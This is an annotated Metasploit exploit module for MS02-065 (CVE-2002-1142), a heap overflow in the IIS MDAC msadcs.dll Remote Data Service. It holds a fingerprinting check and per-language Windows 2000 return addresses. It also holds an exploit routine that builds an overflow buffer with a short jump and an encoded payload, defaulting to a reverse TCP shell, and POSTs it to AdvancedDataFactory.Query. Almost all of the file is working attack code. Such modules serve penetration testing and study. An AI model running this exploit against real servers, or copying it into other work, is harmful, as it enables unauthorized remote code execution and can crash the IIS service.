##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for MS02-065 (CVE-2002-1142): a heap overflow in
# the IIS MDAC Remote Data Service (msadcs.dll) reached through an overly long
# 'Content-Type' string in an RDS DataStub. The class only declares metadata
# and two entry points: #check (fingerprint) and #exploit (delivery).
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata with the framework and declares the
  # TARGETURI option.
  #
  # @param info [Hash] metadata supplied by the framework; merged with the
  #   module's own values via update_info before being handed to super
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow',
        'Description' => %q{
          This module can be used to execute arbitrary code on IIS servers
          that expose the /msadc/msadcs.dll Microsoft Data Access Components
          (MDAC) Remote Data Service (RDS) DataFactory service. The service is
          exploitable even when RDS is configured to deny remote connections
          (handsafe.reg). The service is vulnerable to a heap overflow where
          the RDS DataStub 'Content-Type' string is overly long. Microsoft Data
          Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.
        },
        'Author' => 'aushack',
        'Platform' => 'win',
        'Arch' => [ARCH_X86],
        'References' => [
          ['OSVDB', '14502'],
          ['BID', '6214'],
          ['CVE', '2002-1142'],
          ['MSB', 'MS02-065'],
          ['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html']
        ],
        'Privileged' => false,
        # Payload constraints: 1024 bytes of space, and a BadChars list of the
        # bytes the encoder must keep out of the payload (NUL, whitespace,
        # quotes and HTTP/URL delimiters) because the buffer is sent as the raw
        # request body built in #exploit. All listed bytes are non-alphanumeric.
        'Payload' => {
          'Space' => 1024,
          'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x22\x27:?<>=$\\/;=+%#&", # "\u0000\t\n\v\r \"':?<>=$\\/;=+%#&"
          'StackAdjustment' => -3500
        },
        'DefaultOptions' => {
          'PAYLOAD' => 'windows/shell/reverse_tcp',
          'EXITFUNC' => 'seh' # stops IIS from crashing... hopefully
        },
        # Each target pins 'Ret' to a fixed address in ws2help.dll for one
        # OS / service-pack / language build. There is no automatic target
        # selection (neither #check nor #exploit picks one), so the operator's
        # choice must match the host; DefaultTarget is the English SP0-SP3 entry.
        'Targets' => [
          # jmp eax ws2help.dll
          [ 'Windows 2000 Pro SP0-SP3 (English)', { 'Ret' => 0x75023783 } ],
          [ 'Windows 2000 Pro SP0 (Korean)', { 'Ret' => 0x74f93783 } ],
          [ 'Windows 2000 Pro SP0 (Dutch)', { 'Ret' => 0x74fd3783 } ],
          [ 'Windows 2000 Pro SP0 (Finnish)', { 'Ret' => 0x74ff3783 } ],
          [ 'Windows 2000 Pro SP0 (Turkish)', { 'Ret' => 0x74fc3783 } ],
          [ 'Windows 2000 Pro SP0-SP1 (Greek)', { 'Ret' => 0x74f73783 } ],
          [ 'Windows 2000 Pro SP1 (Arabic)', { 'Ret' => 0x74f93783 } ],
          [ 'Windows 2000 Pro SP1 (Czech)', { 'Ret' => 0x74fc3783 } ],
          [ 'Windows 2000 Pro SP2 (French)', { 'Ret' => 0x74fa3783 } ],
          [ 'Windows 2000 Pro SP2 (Portuguese)', { 'Ret' => 0x74fd3783 } ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2002-11-02',
        # Notes for operators and defenders:
        # CRASH_SERVICE_DOWN - a failed attempt can leave the IIS service down;
        # IOC_IN_LOGS - the single POST sent by #exploit (to
        # TARGETURI/AdvancedDataFactory.Query) leaves an entry in request logs.
        'Notes' => {
          'Reliability' => [REPEATABLE_SESSION],
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    # TARGETURI (legacy alias PATH): where msadcs.dll is served on the host;
    # the default is the well-known /msadc/msadcs.dll location.
    register_options([
      OptString.new('TARGETURI', [ true, 'The path to msadcs.dll', '/msadc/msadcs.dll' ], aliases: [ 'PATH' ]),
    ])
  end

  # Fingerprints the RDS endpoint with one request to TARGETURI. No 'method'
  # is given, so the HttpClient default (GET) applies.
  #
  # @return [Msf::Exploit::CheckCode]
  #   Unknown  - no response at all, or HTTP 500
  #   Safe     - HTTP 403, or any other status/body that does not match
  #   Detected - HTTP 200 whose body carries the x-varg content-type marker
  #   Detected (rather than Vulnerable) because the response only shows the
  #   RDS DataFactory endpoint is reachable; the MDAC version is not verified.
  def check
    res = send_request_cgi('uri' => normalize_uri(target_uri.path))

    # nil means no HTTP reply was obtained at all
    return CheckCode::Unknown('Connection failed') unless res
    return CheckCode::Unknown('HTTP server error') if res.code == 500
    return CheckCode::Safe('Access Forbidden') if res.code == 403

    # 200 plus the x-varg marker in the body is the fingerprint of an exposed
    # RDS DataFactory endpoint; to_s guards against a nil body.
    if res.code == 200 && res.body.to_s.include?('Content-Type: application/x-varg')
      return CheckCode::Detected("#{target_uri.path} content type matches fingerprint application/x-varg")
    end

    # Anything else (other status codes, or 200 without the marker) is Safe.
    CheckCode::Safe
  end

  # Builds the overflow buffer and delivers it as the body of a single POST to
  # TARGETURI/AdvancedDataFactory.Query. The HTTP response is not inspected,
  # so this method itself reports nothing about whether the attempt worked.
  def exploit
    # 136 bytes of alphanumeric filler; alphanumerics avoid every byte listed
    # in the BadChars declared in #initialize.
    sploit = rand_text_alphanumeric(136)
    # overwrite bytes 24-25 of the filler with a 2-byte short jump (offset 117)
    sploit[24, 2] = Rex::Arch::X86.jmp_short(117)
    # selected target's Ret, packed as a 32-bit little-endian value ('V')
    sploit << [target['Ret']].pack('V')
    # followed by the encoded payload
    sploit << payload.encoded

    # The buffer rides in the POST body prefixed with 'Content-Type: ' (this is
    # the request body, not an HTTP header). The return value is discarded.
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/AdvancedDataFactory.Query'),
      'method' => 'POST',
      'data' => "Content-Type: #{sploit}"
    })
  end
end